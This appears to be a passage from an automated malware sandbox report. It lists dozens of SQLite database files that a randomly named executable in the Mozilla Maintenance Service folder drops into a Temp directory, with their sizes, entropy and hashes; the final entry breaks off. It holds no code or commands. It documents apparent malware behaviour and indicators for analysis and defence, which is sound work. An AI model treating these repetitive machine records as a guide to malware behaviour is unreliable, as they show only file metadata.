                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\W8yaX42fQq

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WBn5a3ayp2

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Wn9RA1lovq

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\WruU21W9A4

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\X4hdzOtESZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\X7p528D6y9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\XaQTNye7CL

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YDCK6dwrnq

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YV6LH0szjy

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YYw6JL2AZ0

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Yh3GeSbIZw

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\YnIW9B5dYo

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ZNkdwsAKY7

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ZTDbDOsSJK

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ZWOaOABw91

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ZYXxzdK2aV

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\aXyxP8jwgM

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\abtFDYwehm

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\agGqTTtl8W

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bIXPyrLTqt

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bVG35NFtel

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bVqtuO7HED

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
